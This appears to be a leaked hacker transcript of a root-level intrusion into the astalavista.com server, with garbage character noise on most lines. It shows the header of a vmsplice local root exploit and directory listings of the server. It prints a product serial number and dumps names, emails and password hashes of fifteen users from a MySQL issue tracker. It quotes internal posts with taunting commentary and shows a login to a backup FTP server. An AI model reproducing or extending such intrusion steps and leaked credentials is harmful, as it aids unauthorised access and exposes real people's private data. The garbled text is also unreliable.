, m7 d0 m; }7 y+ @2 E-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql& J7 E/ Z5 F+ z' j
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
2 [9 S5 c5 C; B-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
& |, V3 n/ V1 O; N) Z8 ~-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
0 Q$ f7 k" W! Z& Q( u `0 E, [-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile0 D+ X2 b# t3 s1 a5 \+ m; l
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc& H' N9 F, Q1 M$ ]5 z3 r- z3 l
drwx–x–x 3 com com 4096 Jan 29 2008 domains) }4 }+ Z; V7 ^7 k' V+ j
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
" m! L5 s# H) f1 O& C- v7 f: ^drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
! T: A0 O5 T9 k/ R: A+ j8 T-rw——- 1 com com 69 Nov 18 2008 .lesshst! c- M3 g" Z! I' M* g1 E
drwx—— 2 com com 4096 Sep 24 2007 mail
3 E; [0 Y' {8 ^& r2 p3 |* b-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
5 n4 q- e# @5 F2 k9 t udrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp$ r+ M: t# @4 j4 N4 T
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html; B; {; }0 P/ I2 r8 u( Z0 ^5 a
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
3 I0 F) F' L+ b: y% j7 D) k: ~drwx—— 2 com com 4096 Aug 26 2008 .ssh
) J1 f7 P7 R* J- _-rwx—— 1 com com 8515 Feb 10 2008 t
! d- m7 \9 p: `+ q2 L1 N# ?-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c$ w5 u) a3 a& b) T5 D) X. R
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp5 s$ i: `0 A/ c( _! w# Q% F& M1 _
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
/ M# l" K2 v$ h& {5 l' [6 M- U-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
% B: X" l7 U P. {+ K3 F-rw——- 1 com com 16629 Mar 28 21:46 .viminfo" B5 I0 n/ l; H# }/ `- q
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
' X% z0 s3 x; `+ I$ H3 n" R' X& x+ G( B- q9 O
sh-3.2# head t.c
9 S) b" Y# M8 P& m/*3 ^4 ^& y" r+ w0 n# m) u$ C
* jessica_biel_naked_in_my_bed.c
( k8 A5 G. d2 s/ d5 W- j& ] R*' A* ?4 M$ `' Y- @6 ^
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.7 D* b! m' a& f0 f8 t. I1 ~
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
% w) e6 J8 p6 D. h6 Z* Stejnak je to stare jak cyp a aj jakesyk rozbite.
7 m1 U/ ~5 y" Z& T" |8 B*
. g5 e H- [5 ^. T3 T; t: V. r! R* Linux vmsplice Local Root Exploit
6 ~! j: y- F, P, u3 N: K* E* By qaaz
" G$ F6 ?! f! Y0 o*
# ~ M$ t8 a: ]; P5 x: O$ u" i. g8 v" E6 }* S# F
sh-3.2# cd /
2 e/ H6 c$ K; F" k- u psh-3.2# ls -la
0 Y* \2 a8 v# Q& ?' C7 F. G, Wtotal 360' E% C* h, Q# T3 W" [2 m$ h" v
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
' @7 I2 u, }0 M4 Edrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..: }' [, F1 e: p, b# Z* }0 q7 B
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group9 K7 s. Y0 o! N$ A: A
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user! _( b' t2 c, f4 ]) l
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
@$ @+ d3 I" |) o( B" n-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
' R2 `7 ~8 o+ ~8 [9 }-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel* M& }+ v& e6 R# V" b
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup' b' ^1 L) j+ ?6 s: N* m6 J
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
! C- o5 _2 ~5 n! N' d! a+ Sdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot8 l4 {* h0 `: l4 C# `& u
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev9 [5 X* ^; f! I8 ]$ e
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
7 u5 Q* w! j$ M$ r U: ndrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
6 c4 s1 D+ Z! b5 F, p-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf4 N# c! I1 ]4 V
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib% M8 r- {) H1 [6 J7 w, c7 |6 e Z
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
) r* ?! x; b& K/ f* d2 ^) j! ~: ^/ @drwx—— 2 root root 16384 Sep 11 2007 lost+found, s7 o9 y/ f3 r9 m5 S- U4 v$ b
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media7 P' O) t, [8 u% w7 v& |
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
) Z9 V8 d6 e) T, D% E" ~drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
% u7 E. ~) p4 J3 ?; P. F-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
6 L, t! E9 ?5 G( [% Y3 fdrwxr-xr-x 2 root root 0 Jun 3 02:43 net9 C% ?; F6 Q- f8 I: O6 f
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
; C1 B; T! B5 E0 N! Q' ^1 a( @dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc; ]5 ?( w8 J. F! d5 J* O
drwxr-x— 15 root root 4096 Jun 4 08:40 root
# u/ s8 O$ L% n8 Z( Jdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin* v5 ]6 c# a5 Z1 L
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux/ V+ ~1 O, `$ i' u: d
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
, A2 ]* |6 ?" Udrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
- C( P+ D u0 J$ ^4 m! Adrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
# z+ M. m& L% ]1 J! q. g& Gdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
9 R6 ^/ l1 ?% Ddrwxr-xr-x 26 root root 4096 Jun 4 03:16 var& V% u1 F4 Q' S5 y
+ O1 X6 Q; K* C4 m. n
sh-3.2# cd opt
/ }6 w: o' a/ D# I% k. ?' wsh-3.2# ls -la6 }& o& d2 j/ Y' ~5 a$ G
total 20
" N7 y% m ?5 r6 Zdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
4 h# r! K' y! y% q+ Vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
$ ?4 ?, J- _+ j% Y+ q! vdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
. n2 i0 O$ @2 b9 @$ ~/ C2 F" Q6 P4 ~
sh-3.2# cd lsws/
0 \! D d1 g3 {5 E( Z" Hsh-3.2# ls -la
2 _% F) E! q& }" @total 108
/ C! W- Q, l7 A# Zdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
+ _8 K. _7 o9 h& h) ~1 Vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
3 q3 V5 w3 Q& G# v4 ]- udrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons0 x& s- H* R1 R* O% _
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
t- c, Y& ?1 {" ~& Odrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
2 L: ^4 o3 [: H& Mdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
0 Y6 s& |9 T/ Udrwx—— 4 apache apache 4096 Jun 3 02:43 conf7 ^$ V- t& f8 W: A+ G
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT& i$ O( m: T, k$ B
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
1 h5 f: L- H4 h6 N- w% @drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin1 t7 V0 k7 D; V
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib. N) _3 Y- u6 `; A* Q
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE0 U7 L$ z, `' Q: e2 y
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
( U/ ?: k7 @" ?1 r) N-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
& w, L8 \# a7 W6 j4 T2 |-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP2 I m8 Z# X h4 T
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
& F4 a# w1 }" f7 o5 Ydrwxr-xr-x 2 root root 4096 Mar 20 2008 php7 E3 J8 j( ~5 g& b# \1 Q
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
$ Q/ Q8 L9 Z; N9 Udrwxr-xr-x 3 root root 4096 Mar 20 2008 share' j! i0 m' S6 c, x6 O2 Z
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
: x G0 e" d8 v1 q# k* V9 E4 A- ]. _; O6 b5 `. l
sh-3.2# cd conf5 B( F/ s3 |) D/ B
sh-3.2# ls -la, t/ F0 }% ?- H& d* D* _" L* J8 G
total 483 I$ M7 h% X' z i0 u! o4 q
drwx—— 4 apache apache 4096 Jun 3 02:43 .0 E; T9 S1 _0 O' w
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..) v" q# e, N! Z
drwx—— 2 apache apache 4096 Mar 20 2008 cert8 B g' ^% m& }0 v* v6 H* f9 H* o
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
& x) h7 t8 e) ], |-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak: z' a/ `4 B( t ^# K
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
2 |% s. m, G" W: l- i-rw——- 1 apache apache 256 May 29 15:10 license.key
! v/ A$ ~2 \6 Q, x-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
s7 G5 L- h$ ~, F: e( }) ^-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties& W! W* f- r' t) T* B
-rw——- 1 apache apache 20 May 29 15:10 serial.no2 p# A$ s. z( y. u- l
drwx—— 2 apache apache 4096 Mar 20 2008 templates" T$ `8 X' }9 v; ?
5 Z* P& q6 w3 bsh-3.2# cat serial.no
7 ~3 S3 U, E, F" oIbDl-oVsO-CKqL-wVRa
) Z9 k( u; E ~
! X1 _$ m0 k7 N- _- bsh-3.2# mysql& }- H7 z/ m: o1 a' T$ G+ \
Welcome to the MySQL monitor. Commands end with ; or \g.
, M# r$ p- w5 A' ^$ i, v$ jYour MySQL connection id is 286844
- w# J1 r; }& d1 }" f8 qServer version: 5.0.45-community-log MySQL Community Edition (GPL)9 d! E w |* d( h' A& w
' L, L1 I% r) ?7 t- a( R" j& V; s
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
u$ K$ x7 s( M9 n/ p
( f/ t+ P, V# n5 q+ U& h( z7 Amysql> show databases;4 x8 }* c9 m# Z( r) t& h; l5 Z
+———————–+* f( I$ R w* V: D( g. x
| Database |
$ J2 V3 }6 _3 H: K% Q) |; E* t+———————–+
# S& n5 }4 J; H/ V. g( Q| information_schema |& R8 c: q4 l9 u% p. Y! m
| astanet_ads |% D! x p6 u$ i' L, Q' q
| astanet_mailing_lists |1 A- _2 Y% l9 ^" ?% J
| astanet_mediawiki | }1 s+ |) L9 s D) p3 d
| astanet_membersystem |8 r8 B9 z& ?7 k. ~7 |5 i1 e
| com_contrexx |, t* t6 d! @: O i
| com_contrexx2 |4 z# k! p$ f" i1 |' v7 y3 H! Y
| com_contrexx2_live |) @ Q6 S/ O9 W7 [4 c) B; r# u0 T
| da_roundcube |
$ \9 x, l( w5 E7 n Z I& V; d$ W+ A| dolphin |( M% m6 S( S4 R8 a. x* f
| ideapool |* N9 k/ {% J( k( u4 W/ j
| mysql |, ^# Z5 ~! j7 @
| test |' ~4 L/ [2 [' g, e* N: c$ S
| yourmaster |
1 d. s" Q2 @, z+———————–+
( u* t$ _8 }" b9 Z2 D( R/ T9 H: K- g6 A14 rows in set (0.00 sec)
3 o5 F) i3 {$ \) ^$ U4 U: J, Y: O% c2 j) s' M: X+ O( e; ^# E7 T. B( w; Y9 B
mysql> use ideapool
. G% F7 i c) ADatabase changed
4 d. d0 s8 K6 _3 k8 p# [1 smysql> show tables;7 {9 a! b2 p8 A9 @* \5 v
+———————————–+* Z- y3 c. D! k1 {" V
| Tables_in_ideapool |) ]: r& p' P2 x( s
+———————————–+9 R1 y0 r. B5 }/ L9 U; m
| eventum_columns_to_display |" F/ g ^ h4 N8 U: e" C9 | p
| eventum_custom_field |
+ E- C! ^- a% G7 @; |5 b| eventum_custom_field_option |% f3 v- h" E1 t: [6 t% h
| eventum_custom_filter |
m' n" k u" [| eventum_customer_account_manager |
6 j- ^3 t7 v, F& Q5 E+ i- d| eventum_customer_note |$ Q6 D" @, k4 @. s4 N
| eventum_email_account |: p, u( \8 k, J4 F/ q
| eventum_email_draft |+ ^0 ^4 `/ I, d ?
| eventum_email_draft_recipient |/ I: |/ J1 p1 k3 B6 G) x
| eventum_email_response |9 N' b4 o& E, m b3 u5 W F
| eventum_faq |
7 _& `6 p/ H$ Z& k3 || eventum_faq_support_level |5 T% i1 ~% f2 W$ E# S j- |
| eventum_group |
5 R5 r2 t, a7 G- a7 _/ x| eventum_history_type |! u7 V7 Z3 V# Z
| eventum_irc_notice |
9 E, N' F- ?" {) U( C| eventum_issue |4 z% ]4 D: v+ ? c
| eventum_issue_association |
- l) `5 A8 }" @& B. p* d* X" ~ C/ H| eventum_issue_attachment |
1 B9 `$ \3 I! E% Q+ m8 n+ _9 `| eventum_issue_attachment_file |/ l" I: `5 [$ Q; a' S) y- R" N" A
| eventum_issue_checkin |
: [& Q( N( E" S| eventum_issue_custom_field |
% p, l+ v5 X8 N0 k| eventum_issue_history |* h$ Y, B# K9 [
| eventum_issue_quarantine |" T% Z' X/ E; |+ s
| eventum_issue_requirement |
3 h5 H0 V, I: P' i; z' F4 T0 J1 z( d+ z| eventum_issue_user |
& D+ A8 i1 @: K8 b| eventum_issue_user_replier |% l! i# H3 s7 }6 Z; M
| eventum_link_filter |* a1 G0 x( k1 {2 t# S2 _7 o/ @- G- `
| eventum_mail_queue |* k1 x* E, X3 L
| eventum_mail_queue_log |9 D7 V; n6 D0 z( z
| eventum_news |/ V; B2 T* X- L1 s8 V" G
| eventum_note |5 M! Y9 H5 M: t" M% d: l
| eventum_phone_support |
1 ^, w/ I5 [! `| eventum_project |
6 l( W2 p* L1 e' g3 O| eventum_project_category |
1 r! v$ L' o: C$ \| eventum_project_custom_field |
: S# k% w: Z* d8 k| eventum_project_email_response |
; u& Y; U" p2 @, S$ A3 j$ f| eventum_project_field_display | h2 x a$ K5 A5 a
| eventum_project_group |
/ R3 B! H5 o$ c( [( i8 l" B" l| eventum_project_link_filter |
* X, v6 h8 r" U! t8 P% R| eventum_project_news |
: [& ~& P( b: c| eventum_project_phone_category |( |) S2 N& \- T; d! k l+ j
| eventum_project_priority |9 J% ^7 ~9 A6 w) v% C+ O& H7 q/ [+ v( J1 ?
| eventum_project_release |
v K9 G3 b5 i| eventum_project_round_robin |
7 K w% T6 Y- b/ u' B| eventum_project_status |
8 Y! _$ n1 F# \5 ^| eventum_project_status_date |5 \ r4 O6 ?+ n( p( X
| eventum_project_user |7 J, g% s1 Q$ K9 G; M
| eventum_reminder_action |
7 I% n Y3 Z7 }: Y| eventum_reminder_action_list |
2 l# B6 R, r; N# S3 h- p# y9 d9 _' s| eventum_reminder_action_type |% L: F( y& `) [- Y$ l
| eventum_reminder_field |
4 n: z0 |2 {# C2 S0 Q| eventum_reminder_history |$ f' \6 H; v4 p( p. }
| eventum_reminder_level |
& m1 |, p- i% ]* {: O$ Y6 G| eventum_reminder_level_condition |
& M, m5 v) \+ m$ _| eventum_reminder_operator |
6 T; ^( q a7 g- p4 C% g* H| eventum_reminder_priority |
7 l, Q6 [5 u2 x, b' G| eventum_reminder_requirement |# C3 i1 V+ D# Y9 [- C
| eventum_reminder_triggered_action |
8 l- x6 i! r) o* b+ {* O| eventum_resolution |
! \5 G+ d+ r; U; e# F+ B1 s7 q| eventum_round_robin_user |
/ h( f0 Z: D' `9 B2 ^, m| eventum_search_profile |2 f% [( j# ]0 c4 N# o) g5 U
| eventum_status |' h7 O6 L4 }; v9 f' |
| eventum_subscription |9 `6 b0 |3 {$ x# ]
| eventum_subscription_type |) L. R, O. v* ]7 c
| eventum_support_email |3 t6 Q& s% O+ m: z- B
| eventum_support_email_body |
/ N: d8 M: s8 W& _2 n# b| eventum_time_tracking |
7 I# n0 o0 u6 b4 Q0 i| eventum_time_tracking_category |
, n! z% l- m. F6 p1 @7 e/ s- C| eventum_user |( I j7 D- P2 d1 X
+———————————–+8 ]; G, E5 @7 R) p1 W. N y
69 rows in set (0.00 sec)
1 \$ n9 n3 t7 v6 s1 N8 j1 [0 R7 k/ Z9 | m. |, P4 y; |
mysql> describe eventum_user;* @$ ]5 I- w# ~! R1 c
+————————-+——————+——+—–+———————+—————-+
8 b' b3 T1 ?# V: V; A- || Field | Type | Null | Key | Default | Extra |! X9 @# G# U5 z' j5 s
+————————-+——————+——+—–+———————+—————-+; r9 U" {/ J6 }2 f( N; V, g9 ~
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |2 F0 }4 t1 w- s7 q, ^
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
3 z, |+ t' c; O* z| usr_customer_id | int(11) unsigned | YES | | NULL | |: i. T) M" q# T v
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
' O/ o) W% ?, T' z7 P9 b| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |* }1 S0 ^, ], H* ?- i
| usr_status | varchar(8) | NO | | active | |
, m; B7 ^% t6 q: q, {3 i7 V| usr_password | varchar(32) | NO | | | |7 `3 J: h- ^0 J2 A) b
| usr_full_name | varchar(255) | NO | | | |0 f+ e& b m6 r) [/ K
| usr_email | varchar(255) | NO | UNI | | |: D* j1 ]/ ~ m! S8 X; N+ M
| usr_preferences | longtext | YES | | NULL | |3 H* W; ^: Z- e& Q' B
| usr_sms_email | varchar(255) | YES | | NULL | |' Y( ]: U {0 I# f- ~! c3 R2 {
| usr_clocked_in | tinyint(1) | YES | | 0 | |/ Q* _: O- t N" A7 @4 k
| usr_lang | varchar(5) | YES | | NULL | |
2 G- ~0 O/ d2 d8 m/ L# D7 |+————————-+——————+——+—–+———————+—————-+) E! E0 ]+ q9 [* C* o( p
13 rows in set (0.00 sec)( Z6 @+ T9 U7 A. L& H p
" q$ b# v( l& Y- @& m$ q- b# }
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
. n3 l' h- U' I3 Q9 F7 Y. c% Q+———————-+——————————-+———————————-+3 ^+ s4 A u2 X' x [
| usr_full_name | usr_email | usr_password |( H) r$ t0 x8 ]. }; z$ o
+———————-+——————————-+———————————-+2 I2 Z3 {& a3 |1 W
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |* Z/ L& z- Y0 r* S S' }* A
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |* \- I2 z5 \4 C3 K/ w
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
1 y6 J! w# _5 u9 [* M) H1 U5 q/ ?# k| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
2 c, P3 }* }4 R5 c, D: K& c8 [* {| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
, T0 h9 s( S- g; ?% y6 _. W2 ~| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
4 P8 e( |7 n f| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
3 ]& d4 q% q$ ^! c| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
4 l. C5 x3 z2 |% A: ?| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 |2 k1 Q1 O- _& k$ Y% B| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
5 I+ E1 z, t3 s| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
" K7 t8 P: t/ ?; @| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |! }' M" m: X3 K! A$ M# |
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |1 p4 [% s8 W2 ]3 E" [: {1 y
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |# V/ J2 ~* Q& x; k9 X- B: x
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
- S# o/ v& ?' v& N% i" r, a+———————-+——————————-+———————————-+, \! L9 C. p2 y! o- P& c, p9 Y
15 rows in set (0.00 sec)
+ n* u: m! w- C7 A4 J8 ~5 O9 P9 @3 n9 a# J% b7 \0 M
mysql> select iss_description from eventum_issue where iss_id = 43;
+ G$ U6 w+ i* w* t I) q+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+! r5 c" g. O. T' a% E. O
| iss_description * l) e+ Q k& d, i* w* I" F8 t
|
! D% @# t d* _' A; k6 n# o+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
) d5 l0 a; ~7 z| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
! A F2 j# A- w0 S* k& N" Fconnected for 90 mins… 120mins… so what i propose is something like:
3 P+ H: ^ @ q6 ~4 R9 i链接标记[url]http://www.surfthechannel.com/[/url]
" x9 k+ B% U( e7 \/ @2 j9 t0 `since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system) }9 V9 V( Z$ `! K
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
. W J; l; ]# G K+ U8 obreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
+ o" y! E! h4 F& Vif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…1 U3 O% K9 S8 G# Y; i o
6 y5 i% K- w$ _/ F' aWe could also put advertisement during play on the flash video player itself… extra $$… \3 a! e6 J& s' A5 R7 P7 }
1 `5 N# y# B( Q
By sykadul |
* A" l3 }) N- T+ z, W+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; h0 ~# p5 N2 f$ P. @ U6 x
1 row in set (0.00 sec)7 d" M4 X8 F9 j1 _6 R4 ~. x
g) S/ @0 u+ D l: e
// Money and extra $$ is all they care about. remember that.7 r- {4 z. j W
3 E$ j1 V6 I- g& C3 g' B
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
: C6 u: ~+ N) _5 P& g& l+————————+——————————————————————————————————————————————————————————————————————————————-+
: k6 G: A7 Z4 |3 N5 ~% J| iss_summary | iss_description
" V ~8 L: M X: }1 o8 a|% @$ J% S9 o# G/ q/ g4 _
+————————+——————————————————————————————————————————————————————————————————————————————-+/ ? I1 q! w$ z8 y5 o9 A4 ~! E) h
| Forum for REAL EXPERTS | Hello,( O/ P3 Q7 `. R
9 ?) u* a' a7 }4 u, WIshtus and I,5 G1 X" }+ t2 A8 d, P" P8 r3 q
2 i: q( O* P; k# B
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide; I% o" R$ D$ [, R$ E. }( q1 V c
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..2 M0 s, ^# u5 }
# u! H# M- l# O- U
One example a friend of mine from coresecurity.com!
7 ?1 z% r1 H: Y3 V% ^6 ` r- E2 l/ e
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..+ D% f7 z2 `: q/ H }7 ~/ V
2 O' C# t& w* B6 C' x8 x0 i
|! `# K# g) g. T( t
+————————+——————————————————————————————————————————————————————————————————————————————+/ z5 Z' \7 i% m, S3 f
1 row in set (0.00 sec)( R( d% o2 j% O: o
+ G" \. u& o( Y- O1 Y% A- ~7 ?
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
! g: a8 t1 _* O) o
4 ?# j4 h$ @. @+ x( V3 D& |. O* @mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;# C' @6 `8 F, d7 E3 l7 w: f+ P+ M
+——————+———————————————————————————————+
4 H1 W1 |8 V& X S9 d) e0 e| iss_summary | iss_description |
; U6 A- ~- \; {: T( w. {+——————+———————————————————————————————+
5 P9 N6 V# k0 _: u5 @ ^: q: T| Website guidance | Virtual Girl which guides you trought the website.0 ^% z3 H8 N0 `7 i7 A
& m% f! f1 R7 ~/ s$ A/ Z- V5 W
We need a girl with who you can ( talk )!!!! }$ w. ~: W0 w& |. l* o
Also for the News!7 V: `6 b$ S$ r% W8 x! h
So my suggestion is a girl who read you the news loud if you like!
7 T$ e) e: i0 Vyou can choose between read yourselfe or she read it for you or both!
+ H) S5 Y3 I7 e5 _. n4 L1 x' F/ B8 F2 ?0 b% T% \" h5 p( X
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!4 A; \9 J( p# K2 q {+ k9 f- |5 z2 Q
0 k3 P, k. T* G& g6 V) v
Have a look on the example girls!!
: C. R! K# r2 ^: a" K* K+ J5 Y; K9 B) A; P, y9 M! M+ z, l
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]1 C; z! f* @- N+ U
/ S$ P- m1 o& a3 P" R1 w Uor that6 s2 g& e, |3 K" s$ ^
7 \- v( r+ ^, {- K) D+ m! `链接标记[url]http://www.yellostrom.de/[/url]. L/ Y: r. K& f8 }+ i% W
$ l: {7 q" x% w1 ~
|! q: Y5 Y) Z- p
+——————+———————————————————————————————++ V9 e* D {9 H9 d1 B! [" ]! ~
1 row in set (0.00 sec)
' U, `8 n7 w5 F* ~0 C7 G9 l0 d* G/ U* d! t# s+ E( X6 q+ I, _7 g3 w
// ha ha.5 x- ~. B; E! I. z
, i5 H& O0 d! j+ x0 @( dmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;. c9 z, ]1 E' K
+————————–+———————————————————————————————————–+
. I7 Z$ [* M# [" y| iss_summary | iss_description |9 c( U; K6 i Z0 u; H) g
+————————–+———————————————————————————————————–+4 [+ g8 Z8 h/ |
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
! Z0 f4 ~! J% Y# r I+————————–+———————————————————————————————————–+& w9 b& _1 ]' R! `- t$ U) i9 V
1 row in set (0.00 sec)
: I* k! p1 l& [! h4 M& `; G2 j7 p* [# y
// LOL., r6 u5 @$ I0 @6 b& h
+ p: P( N# t4 `mysql> exit4 _# Z3 u$ C' V, \# O4 }- T9 { o
Bye, z, e; X6 U( c. S T6 K E* C
8 N/ C- x) G" y+ b' Y8 E. K. }sh-3.2# ftp 212.254.194.163
2 C4 p1 y/ N% E- S2 O, MConnected to 212.254.194.163.: \/ D L9 @) x9 ], q& T
220 BackupCOM_VW FTP server ready. U: K' h% }! E" ^8 q1 ^
504 AUTH: security mechanism ‘GSSAPI’ not supported.
% f# A, f! y0 h4 e504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
# U5 \8 F! F0 C6 H+ ]KERBEROS_V4 rejected as an authentication type
0 r$ T6 f6 |2 f3 Y' |Name (212.254.194.163:root): astalavista.com7 g3 F6 [) i) M1 i( p+ z6 p
331 Password required for astalavista.com.
: m7 I& c/ V. s6 j4 L/ NPassword:
$ H$ z) M4 K$ Z- Q) z, [230 User astalavista.com logged in.
; v0 p* K$ ]/ K6 X [Remote system type is UNIX.+ L7 I5 A F4 Z) ^/ q* |
Using binary mode to transfer files.; c/ o5 Z7 v, I$ v; v/ p
ftp> ls -la
2 ]. L* ? G- a7 H4 I227 Entering Passive Mode (212,254,194,163,2,188)
3 {- y4 @3 w( G8 A2 ^150 Opening BINARY mode data connection for ‘file list’.. P$ t G8 f6 i: ?
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com- W+ b4 W* o* ^1 i' K9 E4 a, n
226 Transfer complete.# b' J& N! G1 v9 F R2 D0 {
ftp> cd astalavista.com% f" d l- ] L0 z4 H
250 CWD command successful.) e' [7 ]5 w, @3 K! @ g U. `
ftp> ls -la! a0 A2 J* R! [5 a
227 Entering Passive Mode (212,254,194,163,2,189)
) U" T/ i, q& n4 v6 [$ D150 Opening BINARY mode data connection for ‘file list’.
) P2 K( V7 i5 f# p-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar$ q) c, |8 W! S: L& G
